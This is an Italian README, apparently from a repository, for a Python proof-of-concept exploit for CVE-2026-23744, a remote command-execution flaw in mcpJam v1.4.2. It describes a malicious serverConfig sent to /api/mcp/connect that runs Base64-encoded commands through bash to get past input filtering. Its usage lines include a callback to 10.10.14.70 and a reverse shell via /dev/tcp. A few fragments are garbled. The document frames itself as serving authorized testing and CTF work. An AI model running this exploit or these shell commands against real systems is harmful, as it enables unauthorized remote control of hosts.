
cve-2026-23744 exploit Python
Un proof-of-concept in Python 3 per CVE-2026-23744, una vulnerabilità di esecuzione arbitraria di comandi che colpisce mcpJam v1.4.2.
Questa utility automatizza la consegna del payload codificando trasparentemente i comandi in Base64 prima della trasmissione, aiutando a bypassare meccanismi restrittivi di validazione dell'input e di filtraggio dei caratteri. Il payload viene decodificato ed eseguito tramite un wrapper /bin/bash sul sistema target.
I comandi vengono automaticamente codificati prima della trasmissione, migliorando l'affidabilità quando si prendono di mira applicazioni che impongono una rigorosa validazione dell'input o restrizioni sui caratteri.
Supporta l'esecuzione di comandi arbitrari, inclusi:
sh, bash, nc, ecc.)Mostra:
Ciò semplifica la risoluzione dei problemi e la validazione dello sfruttamento.
Sopprime gli avvisi di verifica dei certificati, consentendo l'interazione con target che utilizzano certificati SSL autofirmati o altrimenti non attendibili.
Installa la dipendenza richiesta:
pip install requests
python3 exploit.py <target_url> "<comando>"
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
Lo sfruttamento ha come target l'endpoint /api/mcp/connect creando un oggetto serverConfig dannoso.
Invece di trasmettere i comandi direttamente, il payload viene trasformato in una stringa codificata in Base64 ed eseguito tramite Bash:
"args": [
"-c",
f"echo {base64_payload} | base64 -d | bash"
]
Questo approccio aiuta a eludere il filtraggio a livello di applicazione, assicurando al contempo che il payload venga decodificato ed eseguito interamente sull'host target.
serverConfig.base64 -d./bin/bash.[!WARNING] Questo progetto è fornito esclusivamente a scopo educativo, per valutazioni di sicurezza autorizzate e ambienti Capture The Flag (CTF).
L'uso non autorizzato contro sistemi per i quali non si dispone di esplicita autorizzazione è illegale e non etico. L'autore non si assume alcuna responsabilità per uso improprio, danni o conseguenze legali derivanti dall'uso di questo software.